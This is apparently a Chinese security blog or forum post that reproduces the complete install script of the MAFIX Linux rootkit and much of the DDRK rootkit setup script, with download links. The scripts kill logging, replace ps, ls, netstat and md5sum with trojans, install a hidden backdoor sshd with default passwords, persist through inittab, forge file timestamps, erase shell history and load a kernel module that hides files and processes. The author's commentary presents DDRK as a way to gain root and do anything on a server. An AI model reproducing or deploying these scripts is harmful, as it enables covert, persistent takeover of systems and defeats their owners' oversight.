查找一个目录下的一个目录下的隐藏文件
find PATH -name ".*" -type f
name 匹配要用双引号" ".
可以查看被rootkit或web页面所隐藏的webshell和back door。
查找一个目录下的一个目录下的隐藏文件
find PATH -name ".*" -type f
name 匹配要用双引号" ".
可以查看被rootkit或web页面所隐藏的webshell和back door。
MAFIX - Linux 2.6 rootkit
这后门很贱,服务器中过一次,属于这个后门的改版。那个添加了模块。
下载地址:
https://forum.eviloctal.com/attachment.php?aid=13419
内容:
MAXFIX
---HOW-TO
---mafix
---mafixlibs
---root
下面为root的内容,也就是安装脚本。
#!/bin/bash
######################
# mafix 0.2 #
# fud 2009/07/15 #
######################
BASEDIR=`pwd`
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
BLK=' [1;30m'
MAG=' [1;35m'
CYN=' [1;30m'
RED='^[[1;32m'
DMAG=' [1;37m'
RES=' [0m'
echo "${CYN} ___ ___ ___ ${DMAG} ${CYN} ___ ${RES}"
echo "${CYN} /__/ / / / / ${DMAG} ___ ${CYN} /__/| ${RES}"
echo "${CYN} | |:: / /:: / /:/_ ${DMAG} / / ${CYN} | |:| ${RES}"
echo "${CYN} | |:|: / /:/: / /:/ / ${DMAG} / /:/ ${CYN} | |:| ${RES}"
echo "${CYN} __|__|:|: / /:/~/:: / /:/ /:/ ${DMAG}/__/:: ${CYN} __|__|:| ${RES}"
echo "${CYN} /__/::::| : /__/:/ /:/: /__/:/ /:/ ${DMAG}__/:__ ${CYN} /__/::::____${RES}"
echo "${CYN} :~~__/ :/:/__/ :/:/ ${DMAG} :/ ${CYN} ~~~::::/${RES}"
echo "${CYN} : ::/ ::/ ${DMAG} __::/${CYN} |~~|:|~~ ${RES}"
echo "${CYN} : : : ${DMAG} /__/:/ ${CYN} | |:| ${RES}"
echo "${CYN} : : : ${DMAG} __/ ${CYN} | |:| ${RES}"
echo "${CYN} __/ __/ __/ ${DMAG} ${CYN} |__|/ ${RES}"
echo "${DMAG}${RES}"
echo "${DMAG}- the ferrari of rootkits - ${RES}"
sleep 5
echo "${CYN}mafix!${DMAG} > ${CYN} extracting libs...${RES}"
tar zxf mafixlibs
if [ "$(whoami)" != "root" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} you need to be root to backdoor the box...${RES}"
exit
fi
cd $BASEDIR
sleep 1
killall -9 syslogd >/dev/null 2>&1
startime=`date +%S`
echo "${CYN}mafix!${DMAG} > ${CYN} backdooring box...${RES}"
SYSLOGCONF="/etc/syslog.conf"
REMOTE=`grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2`
if [ ! -z "$REMOTE" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} Remote logging found! I hope you got access to these box:${RES}"
echo
for host in $REMOTE; do
echo -n " "
echo $host
done
echo
echo ' ${CYN}coz this box is logging to it${RES}'
echo
else
echo "${CYN}mafix!${DMAG} > ${CYN} no remote logging found...${RES}"
fi
uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd
if [ -d /etc/tripwire ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} WARNING: TRIPWIRE FOUND!${RES}"
if [ -f /var/lib/tripwire/$uname.twd ]; then
chattr -isa $twd #去保护,如果有的话,覆盖,chattr +isa 写保护
else
echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire db found...${RES}"
fi
else
echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire was detected..${RES}"
fi
# restoring login
if [ -f /sbin/xlogin ]; then
chattr -isa /sbin/xlogin
chattr -isa /bin/login
mv -f /sbin/xlogin /bin/login
chmod 7455 /bin/login
chattr +isa /bin/login
fi
echo "${CYN}mafix!${DMAG} > ${CYN} installing trojans...${RES}"
if [ -f /etc/sh.conf ]; then
chattr -isa /etc/sh.conf
rm -rf /etc/sh.conf
fi
# checking if we got needed libs and filez
if [ ! -f /lib/libproc.a ]; then
mv bin/lib/libproc.a /lib/ 2>/dev/null
fi
if [ ! -f /lib/libproc.so.2.0.6 ]; then
mv bin/lib/libproc.so.2.0.6 /lib/ 2>/dev/null
fi
echo "${CYN}mafix!${DMAG} > ${CYN} hold on...${RES}"
/sbin/ldconfig >/dev/null 2>&1
if [ ! -f /usr/bin/md5sum ]; then
touch -acmr /bin/ls bin/md5sum
cp bin/md5sum /usr/bin/md5sum
fi
DEFPASS=race
DEFPORT=11111
if test -n "$1" ; then
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $1${RES}"
cd $BASEDIR/bin
echo -n $1|md5sum > /etc/sh.conf #生成密码文件
else
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPASS${RES}"
echo -n $DEFPASS|md5sum > /etc/sh.conf
fi
touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
chattr +isa /etc/sh.conf #写保护
if test -n "$2" ; then
echo "${CYN}mafix!${DMAG} > ${CYN} Port:${DMAG} $2${RES}"
echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config
echo "3 $2" >> $BASEDIR/bin/headers/hosts.h
echo "4 $2" >> $BASEDIR/bin/headers/hosts.h
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null
else
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPORT${RES}"
echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config
echo "3 $2" >> $BASEDIR/bin/headers/hosts.h
echo "4 $2" >> $BASEDIR/bin/headers/hosts.h
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $B ASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null
fi
if [ -f /lib/lidps1.so ]; then
chattr -isa /lib/lidps1.so
rm -rf /lib/lidps1.so
fi
if [ -f /usr/include/hosts.h ]; then
chattr -isa /usr/include/hosts.h
rm -rf /usr/include/hosts.h
fi
if [ -f /usr/include/file.h ]; then
chattr -isa /usr/include/file.h
rm -rf /usr/include/file.h
fi
if [ -f /usr/include/log.h ]; then
chattr -isa /usr/include/log.h
rm -rf /usr/include/log.h
fi
if [ -f /usr/include/proc.h ]; then
chattr -isa /usr/include/proc.h
rm -rf /usr/include/proc.h
fi
cd $BASEDIR
mv $BASEDIR/bin/headers/lidps1.so /lib/lidps1.so 2>/dev/null
touch -acmr /bin/ls /lib/lidps1.so #修改文件时间与/bin/ls 时间相同
touch -acmr /bin/ls $BASEDIR/bin/headers/* #修改时间
mv $BASEDIR/bin/headers/* /usr/include/ 2>/dev/null
# Ok lets start creating dirs
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
if [ -d /lib/libsh.so ]; then
chattr -isa /lib/libsh.so
chattr -isa /lib/libsh.so/*
rm -rf /lib/libsh.so
fi
if [ -d /usr/lib/libsh ]; then
chattr -isa /usr/lib/libsh
chattr -isa /usr/lib/libsh/*
rm -rf /usr/lib/libsh/*
fi
mkdir $SSHDIR 2>/dev/null
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR 2>/dev/null
touch -acmr /bin/ls $HOMEDIR
cd $BASEDIR/bin
mv .sh/* $SSHDIR/ 2>/dev/null
mv .sh/.bashrc $HOMEDIR 2>/dev/null
if [ -f /sbin/ttyload ]; then
chattr -AacdisSu /sbin/ttyload
rm -rf /sbin/ttyload
fi
if [ -f /usr/sbin/ttyload ]; then
chattr -isa /usr/sbin/ttyload
rm -rf /usr/sbin/ttyload
fi
if [ -f /sbin/ttymon ]; then
chattr -isa /sbin/ttymon
rm -rf /sbin/ttymon
fi
mv $SSHDIR/sshd /sbin/ttyload 2>/dev/null
chmod a+xr /sbin/ttyload 2>/dev/null
chmod o-w /sbin/ttyload 2>/dev/null
touch -acmr /bin/ls /sbin/ttyload
chattr +isa /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1
mv $BASEDIR/bin/ttymon /sbin/ttymon 2>/dev/null
chmod a+xr /sbin/ttymon 2>/dev/null
touch -acmr /bin/ls /sbin/ttymon
chattr +isa /sbin/ttymon
kill -9 `pidof ttymon` >/dev/null 2>&1
cp /bin/bash $SSHDIR
# INITTAB SHUFFLING
chattr -isa /etc/inittab
cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1
cat /etc/inittab |grep getty > /tmp/.init2
echo "# Loading standard ttys" >> /tmp/.init1
echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1
cat /tmp/.init2 >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# modem getty." >> /tmp/.init1
echo "# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# fax getty (hylafax)" >> /tmp/.init1
echo "# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# vbox (voice box) getty" >> /tmp/.init1
echo "# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6" >> /tmp/.init1
echo "# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# end of /etc/inittab" >> /tmp/.init1
echo "/sbin/ttyload -q >/dev/null 2>&1" > /usr/sbin/ttyload
echo "/sbin/ttymon >/dev/null 2>&1" >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod +x /usr/sbin/ttyload 2>/dev/null
chattr +isa /usr/sbin/ttyload
/usr/sbin/ttyload >/dev/null 2>&1
touch -amcr /etc/inittab /tmp/.init1
mv -f /tmp/.init1 /etc/inittab 2>/dev/null
rm -rf /tmp/.init2
# MAKING SURE WE GOT IT BACKDORED RIGHT !
if [ ! "`grep ttyload /etc/inittab`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} inittab broken, sshd wont be loaded upon reboot :(${RES}"
fi
# Say hello to md5sum fixer boys n gurls !
if [ -f /sbin/ifconfig ]; then
/usr/bin/md5sum /sbin/ifconfig >> .shmd5
fi
if [ -f /bin/ps ]; then
/usr/bin/md5sum /bin/ps >> .shmd5
fi
if [ -f /bin/ls ]; then
/usr/bin/md5sum /bin/ls >> .shmd5
fi
if [ -f /bin/netstat ]; then
/usr/bin/md5sum /bin/netstat >> .shmd5
fi
if [ -f /usr/bin/find ]; then
/usr/bin/md5sum /usr/bin/find >> .shmd5
fi
if [ -f /usr/bin/top ]; then
/usr/bin/md5sum /usr/bin/top >> .shmd5
fi
if [ -f /usr/sbin/lsof ]; then
/usr/bin/md5sum /usr/sbin/lsof >> .shmd5
fi
if [ -f /usr/bin/slocate ]; then
/usr/bin/md5sum /usr/bin/slocate >> .shmd5
fi
if [ -f /usr/bin/dir ]; then
/usr/bin/md5sum /usr/bin/dir >> .shmd5
fi
if [ -f /usr/bin/md5sum ]; then
/usr/bin/md5sum /usr/bin/md5sum >> .shmd5
fi
if [ ! -f /dev/srd0 ]; then
./encrypt -e .shmd5 /dev/srd0
touch -acmr /bin/ls /dev/srd0
chattr a+r /dev/srd0
chown -f root:root /dev/srd0
fi
rm -rf .shmd5
# time change bitch
touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1
touch -acmr /bin/ps ps >/dev/null 2>&1
touch -acmr /bin/ls ls >/dev/null 2>&1
touch -acmr /bin/netstat netstat >/dev/null 2>&1
touch -acmr /usr/bin/find find >/dev/null 2>&1
touch -acmr /usr/bin/top top >/dev/null 2>&1
touch -acmr /usr/sbin/lsof lsof >/dev/null 2>&1
touch -acmr /sbin/syslogd syslogd >/dev/null 2>&1
touch -acmr /usr/bin/slocate slocate >/dev/null 2>&1
touch -acmr /usr/bin/dir dir >/dev/null 2>&1
touch -acmr /usr/bin/md5sum md5sum >/dev/null 2>&1
touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1
# Backdoor ps/top/du/ls/netstat/etc..
cd $BASEDIR/bin
BACKUP=/usr/lib/libsh/.backup
mkdir $BACKUP 2>/dev/null
# ps ...
if [ -f /usr/bin/ps ]; then
chattr -isa /usr/bin/ps
cp /usr/bin/ps $BACKUP
mv -f ps /usr/bin/ps 2>/dev/null
chattr +isa /usr/bin/ps
fi
if [ -f /bin/ps ]; then
chattr -isa /bin/ps
cp /bin/ps $BACKUP
mv -f ps /bin/ps 2>/dev/null
chattr +isa /bin/ps
fi
# ifconfig ...
chattr -isa /sbin/ifconfig
cp /sbin/ifconfig $BACKUP
mv -f ifconfig /sbin/ifconfig 2>/dev/null
chattr +isa /sbin/ifconfig
# netstat ...
if [ -f /usr/sbin/netstat ]; then
chattr -isa /usr/sbin/netstat
mv -f netstat /usr/sbin/netstat 2>/dev/null
chattr +isa /usr/sbin/netstat
fi
chattr -isa /bin/netstat
cp /bin/netstat $BACKUP
mv -f netstat /bin/netstat 2>/dev/null
chattr +isa /bin/netstat
# top ...
if [ -f /usr/bin/top ]; then
chattr -isa /usr/bin/top
cp /usr/bin/top $BACKUP
mv -f top /usr/bin/top 2>/dev/null
chattr +isa /usr/bin/top
if [ -f /lib/libncurses.so.5 ]; then
ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi
if [ -f /usr/lib/libncurses.so.5 ]; then
ln -s /usr/lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi
fi
# slocate ...
if [ -f /usr/bin/slocate ]; then
chattr -isa /usr/bin/slocate
cp /usr/bin/slocate $BACKUP
mv -f slocate /usr/bin/slocate 2>/dev/null
chattr +isa /usr/bin/slocate
fi
# ls ...
chattr -isa /bin/ls
cp /bin/ls $BACKUP
mv -f ls /bin/ls 2>/dev/null
chattr +isa /bin/ls
# find ...
if [ -f /usr/bin/find ]; then
chattr -isa /usr/bin/find
cp /usr/bin/find $BACKUP
mv -f find /usr/bin/find 2>/dev/null
chattr +isa /usr/bin/find
fi
# dir ...
if [ -f /usr/bin/dir ]; then
chattr -isa /usr/bin/dir
cp /usr/bin/dir $BACKUP
mv -f dir /usr/bin/dir 2>/dev/null
chattr +isa /usr/bin/dir
fi
# lsof ...
if [ -f /usr/sbin/lsof ]; then
chattr -isa /usr/sbin/lsof
cp /usr/sbin/lsof $BACKUP
mv -f lsof /usr/sbin/lsof 2>/dev/null
chattr +isa /usr/sbin/lsof
fi
# pstree ...
if [ -f /usr/bin/pstree ]; then
chattr -isa /usr/bin/pstree
cp /usr/bin/pstree $BACKUP
mv -f pstree /usr/bin/pstree 2>/dev/null
chattr +isa /usr/bin/pstree
fi
# md5sum ...
chattr -isa /usr/bin/md5sum
cp /usr/bin/md5sum $BACKUP
mv -f md5sum /usr/bin/md5sum 2>/dev/null
chattr +isa /usr/bin/md5sum
echo "${CYN}mafix!${DMAG} > ${CYN} backdoored some daemons (netstat, ps)${RES}"
cd $BASEDIR
mkdir $HOMEDIR/.sniff 2>/dev/null
mv $BASEDIR/bin/shsniff $HOMEDIR/.sniff/shsniff 2>/dev/null
chmod +x $BASEDIR/bin/sshd 2>/dev/null
mv $BASEDIR/bin/shp $HOMEDIR/.sniff/shp 2>/dev/null
mv $BASEDIR/bin/shsb $HOMEDIR/shsb 2>/dev/null
mv $BASEDIR/bin/hide $HOMEDIR/hide 2>/dev/null
touch -acmr /bin/ls $HOMEDIR/.sniff/shsniff
touch -acmr /bin/ls $HOMEDIR/.sniff/shp
touch -acmr /bin/ls $HOMEDIR/shsb
touch -acmr /bin/ls $HOMEDIR/hide
chmod +x $HOMEDIR/.sniff/* 2>/dev/null
chmod +x $HOMEDIR/shsb 2>/dev/null
chmod +x $HOMEDIR/hide 2>/dev/null
./bin/sshd $1 $2 >> /dev/null
echo "${CYN}mafix!${DMAG} > ${CYN} checking for some vuln daemons....${RES}"
ps aux > /tmp/.procs
if [ "`cat /tmp/.procs | grep named`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} NAMED FOUND! PATCH IT!${RES}"
fi
if [ -f /usr/sbin/wu.ftpd ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} WU-FTPD FOUND! PATCH IT!${RES}"
fi
if [ "`cat /tmp/.procs | grep smbd`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} SAMBA FOUND! PATCH IT!${RES}"
fi
if [ "`cat /tmp/.procs | grep rpc.statd`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} RPC.STATD FOUND! PATCH IT!${RES}"
fi
rm -rf /tmp/.procs
netstat -natp > /tmp/.stats
if [ "`cat /tmp/.stats | grep 443 | grep http`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} MOD_SSL FOUND! PATCH IT!${RES}"
fi
rm -rf /tmp/.stats
# CHECKING FOR HOSTILE ROOTKITS/BACKDORS
mkdir $HOMEDIR/.owned 2>/dev/null
if [ -f /etc/ttyhash ]; then
chattr -AacdisSu /etc/ttyhash
rm -rf /etc/ttyhash
fi
if [ -d /lib/ldd.so ]; then
chattr -isa /lib/ldd.so
chattr -isa /lib/ldd.so/*
mv /lib/ldd.so $HOMEDIR/.owned/tk8
echo "${CYN}mafix!${DMAG} > ${CYN} tk8 found and owned!{RES}"
fi
if [ -d /usr/src/.puta ]; then
chattr -isa /usr/src/.puta
chattr -isa /usr/src/.puta/*
mv /usr/src/.puta $HOMEDIR/.owned/tk7
echo "${CYN}mafix!${DMAG} > ${CYN} tk7 found and owned!{RES}"
fi
if [ -f /usr/sbin/xntpd ]; then
chattr -isa /usr/sbin/xntpd
rm -rf /usr/sbin/xntpd
fi
if [ -f /usr/sbin/nscd ]; then
chattr -isa /usr/sbin/nscd
rm -rf /usr/sbin/nscd
fi
if [ -d /usr/include/bex ]; then
chattr -isa /usr/info/termcap.info-5.gz; rm -rf /usr/info/termcap.info-5.gz
chattr -isa /usr/include/audit.h; rm -rf /usr/include/audit.h
chattr -isa /usr/include/bex
chattr -isa /usr/include/bex/*
mv /usr/include/bex/ $HOMEDIR/.owned/bex2
if [ -f /var/log/tcp.log ]; then
chattr -isa /var/log/tcp.log
cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog
fi
chattr -isa /usr/bin/sshd2 >/dev/null 2>&1
rm -rf /usr/bin/sshd2 >/dev/null 2>&1
echo "${CYN}mafix!${DMAG} > ${CYN} bex2 found and owned!{RES}"
fi
if [ -d /dev/tux/ ]; then
chattr -isa /usr/bin/xsf >/dev/null 2>&1
rm -rf /usr/bin/xsf >/dev/null 2>&1
chattr -isa /usr/bin/xchk >/dev/null 2>&1
rm -rf /usr/bin/xchk >/dev/null 2>&1
chattr -isa /dev/tux >/dev/null 2>&1
mv /dev/tux $HOMEDIR/.owned/tuxkit
echo "${CYN}mafix!${DMAG} > ${CYN} tuxkit found and owned!{RES}"
fi
if [ -f /usr/bin/ssh2d ]; then
chattr -isa /usr/bin/ssh2d
rm -rf /usr/bin/ssh2d
chattr -isa /lib/security/.config/
chattr -isa /lib/security/.config/*
rm -rf /lib/security/.config
echo "${CYN}mafix!${DMAG} > ${CYN} optickit found and owned!{RES}"
fi
if [ -f /etc/ld.so.hash ]; then
chattr -isa /etc/ld.so.hash
rm -rf /etc/ld.so.hash
fi
chattr +isa /usr/lib/libsh
chattr +isa /lib/libsh.so
# GREPPING SHITZ FROM rc.sysinit and inetd.conf
if [ -f /etc/rc.d/rc.sysinit ]; then
chattr -isa /etc/rc.d/rc.sysinit
cat /etc/rc.d/rc.sysinit | grep -v "# Xntps (NTPv3 daemon) startup.."| grep -v "/us r/sbin/xntps"| grep -v "/usr/sbin/nscd" > /tmp/.grep
chmod +x /tmp/.grep
touch -acmr /etc/rc.d/rc.sysinit /tmp/.grep
mv -f /tmp/.grep /etc/rc.d/rc.sysinit
rm -rf /tmp/.grep
fi
if [ -f /etc/inetd.conf ]; then
chattr -isa /etc/inetd.conf
cat /etc/inetd.conf | grep -v "6635"| grep -v "9705" > /tmp/.grep
touch -acmr /etc/inted.conf /tmp/.grep
mv -f /tmp/.grep /etc/inetd.conf
rm -rf /tmp/.grep
fi
# KILLING SOME LAMME DAEMONS
killall -9 -q nscd >/dev/null 2>&1
killall -9 -q xntps >/dev/null 2>&1
killall -9 -q mountd >/dev/null 2>&1
killall -9 -q mserv >/dev/null 2>&1
killall -9 -q psybnc >/dev/null 2>&1
killall -9 -q t0rns >/dev/null 2>&1
killall -9 -q linsniffer >/dev/null 2>&1
killall -9 -q sniffer >/dev/null 2>&1
killall -9 -q lpsched >/dev/null 2>&1
killall -9 -q sniff >/dev/null 2>&1
killall -9 -q sn1f >/dev/null 2>&1
killall -9 -q sshd2 >/dev/null 2>&1
killall -9 -q xsf >/dev/null 2>&1
killall -9 -q xchk >/dev/null 2>&1
killall -9 -q ssh2d >/dev/null 2>&1
echo "${CYN}mafix!${DMAG} > ${CYN} sysinfo:${RES}"
MYIPADDR=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`
echo "${CYN}mafix!${DMAG} > hostname :${CYN} `hostname -f` ($MYIPADDR)${RES}"
uname -a | awk '{ print $11 }' >/tmp/info_tmp
echo "${CYN}mafix!${DMAG} > arch: ${CYN}`cat /tmp/info_tmp` -+- bogomips : `cat /proc/cpuinfo | grep bogomips | awk ' {print $3}'` '${RES}"
echo "${CYN}mafix!${DMAG} > alternative ip: ${CYN} "`hostname -i`" -+- Might be ["`/sbin/ifconfig | grep eth | wc -l`" ] active adapters.${RES}"
if [ -f /etc/redhat-release ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/redhat-release`${RES}"
elif [ -f /etc/slackware-version ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/slackware-version`${RES}"
elif [ -f /etc/debian_version ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/debian_version`${RES}"
elif [ -f /etc/SuSE-release ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/SuSE-release`${RES}"
elif [ -f /etc/issue ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/issue`${RES}"
else echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} unknown${RES}"
fi
echo
echo -n "${CYN}mafix!${DMAG} > cleaning up some traces... ${RES}"
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
if [ -f /.bash_history ]; then
chattr -isa /.bash_history >/dev/null 2>&1
rm -rf /.bash_history
fi
if [ -f /bin/.bash_history ]; then
chattr -isa /bin/.bash_history
rm -rf /bin/.bash_history
fi
cd $BASEDIR
rm -rf /tmp/.r*
cd ..
rm -rf mafix*
echo -n "${CYN}done!${RES}"
echo
rm -rf /tmp/info_tmp
endtime=`date +%S`
echo
echo
echo "${CYN} ___ ___ ___ ${DMAG} ${CYN} ___ ${RES}"
echo "${CYN} /__/ / / / / ${DMAG} ___ ${CYN} /__/| ${RES}"
echo "${CYN} | |:: / /:: / /:/_ ${DMAG} / / ${CYN} | |:| ${RES}"
echo "${CYN} | |:|: / /:/: / /:/ / ${DMAG} / /:/ ${CYN} | |:| ${RES}"
echo "${CYN} __|__|:|: / /:/~/:: / /:/ /:/ ${DMAG}/__/:: ${CYN} __|__|:| ${RES}"
echo "${CYN} /__/::::| : /__/:/ /:/: /__/:/ /:/ ${DMAG}__/:__ ${CYN} /__/::::____${RES}"
echo "${CYN} :~~__/ :/:/__/ :/:/ ${DMAG} :/ ${CYN} ~~~::::/${RES}"
echo "${CYN} : ::/ ::/ ${DMAG} __::/${CYN} |~~|:|~~ ${RES}"
echo "${CYN} : : : ${DMAG} /__/:/ ${CYN} | |:| ${RES}"
echo "${CYN} : : : ${DMAG} __/ ${CYN} | |:| ${RES}"
echo "${CYN} __/ __/ __/ ${DMAG} ${CYN} |__|/ ${RES}"
echo "${DMAG}${RES}"
echo "${DMAG} Password: $1 ${RES}"
echo "${DMAG} Port: $2 ${RES}"
if [ -f /usr/sbin/syslogd ]; then
/usr/sbin/syslogd -m 0
else
/sbin/syslogd -m 0
fi
if [ -f /usr/sbin/inetd ]; then
killall -HUP inetd >/dev/null 2>&1
elif [ -f /usr/sbin/xinetd ]; then
killall -HUP xinetd
fi
DDRK是一个结合了shv和adore-ng优点的Linux内核级rootkit。
DDRK中包含的文件:
netstat #替换系统中的netstat,从ssh配置文件中读取端口并隐藏
rk.ko #内核模块,实现文件和进程的隐藏功能
setup #rootkit安装文件
tty #ava工具
bin.tgz
---ttymon
---sshd.tgz
---.sh
---shdcf2 #sshd配置文件
---shhk
---shhk.pub
---shrs
---sshd #sshd主程序
DDRK下载地址:http://www.sectop.com/soft/ddrk.tgz
因此只要把这些文件上传到服务器上并成功运行,就可以获得该服务器的root权限。为所欲为,无所不能。
setup内容如下:
#!/bin/bash
##########define variables##########
DEFPASS=123456 //默认密码
DEFPORT=43958 //默认端口
BASEDIR=`pwd`
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
##########check is root##########
if [ "$(whoami)" != "root" ]; then
echo "BECOME ROOT AND TRY AGAIN"
echo ""
exit
fi
##########extract all tar##########
tar zxf bin.tgz
cd bin
tar zxf sshd.tgz
rm -rf ./sshd.tgz
cd $BASEDIR
rm -rf bin.tgz
cd $BASEDIR
##########kill syslogd##########
killall -9 syslogd >/dev/null 2>&1
sleep 2
##########remove sh.conf##########
if [ -f /etc/sh.conf ]; then
rm -rf /etc/sh.conf //经过md5sum加密过的密码文件
fi
##########initialize sshd configuration##########
if test -n "$1" ; then
echo "Using Password : $1"
cd $BASEDIR/bin
echo -n $1|md5sum > /etc/sh.conf
else
echo "No Password Specified, using default - $DEFPASS"
echo -n $DEFPASS|md5sum > /etc/sh.conf
fi
touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
if test -n "$2" ; then
echo "Using ssh-port : $2"
echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
echo "No ssh-port Specified, using default - $DEFPORT"
echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi
###########creating dirs##########
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
if [ -d /lib/libsh.so ]; then
rm -rf /lib/libsh.so
fi
if [ -d /usr/lib/libsh ]; then
rm -rf /usr/lib/libsh/*
fi
mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR
cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR
if [ -f /sbin/ttyload ]; then
chattr -AacdisSu /sbin/ttyload
rm -rf /sbin/ttyload
fi
if [ -f /usr/sbin/ttyload ]; then
rm -rf /usr/sbin/ttyload
fi
if [ -f /sbin/ttymon ]; then
rm -rf /sbin/ttymon
fi
mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1
mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
touch -acmr /bin/ls /sbin/ttymon
kill -9 `pidof ttymon` >/dev/null 2>&1
cp /bin/bash $SSHDIR
##########modify inittab##########
cp /etc/inittab /etc/.inittab
sed -e 's@^1:2345@0:2345:once:/usr/sbin/ttyloadn&@' /etc/inittab > /etc/.inittab
touch -acmr /etc/inittab /etc/.inittab
mv -f /etc/.inittab /etc/inittab
echo "/sbin/ttyload -q > /dev/null 2>&1" > /usr/sbin/ttyload
echo "/sbin/ttymon > /dev/null 2>&1" >> /usr/sbin/ttyload
echo "${HOMEDIR}/tty i `pidof ttyload` > /dev/null 2>&1" >> /usr/sbin/ttyload
echo "${HOMEDIR}/tty i `pidof ttymon` > /dev/null 2>&1" >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod 755 /usr/sbin/ttyload
/usr/sbin/ttyload > /dev/null 2>&1
touch -amcr /bin/ls /etc/inittab
###########make sure inittab has modified##########
if [ ! "`grep ttyload /etc/inittab`" ]; then
echo "# WARNING - SSHD WONT BE RELOADED UPON RESTART "
echo "# inittab shuffling probly fucked-up ! "
fi
##########load rk.ko##########
cd $BASEDIR
modprobe -r ehci-hcd
mv -f rk.ko /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko
modprobe ehci-hcd
mv tty $HOMEDIR
##########replace netstat##########
touch -acmr /bin/netstat netstat
mv -f netstat /bin/netstat
##########hide all files and process##########
$HOMEDIR/tty h /etc/sh.conf > /dev/null 2>&1
$HOMEDIR/tty h /lib/libsh.so > /dev/null 2>&1
$HOMEDIR/tty h /usr/lib/libsh > /dev/null 2>&1
$HOMEDIR/tty h /sbin/ttyload > /dev/null 2>&1
$HOMEDIR/tty h /usr/sbin/ttyload > /dev/null 2>&1
$HOMEDIR/tty h /sbin/ttymon > /dev/null 2>&1
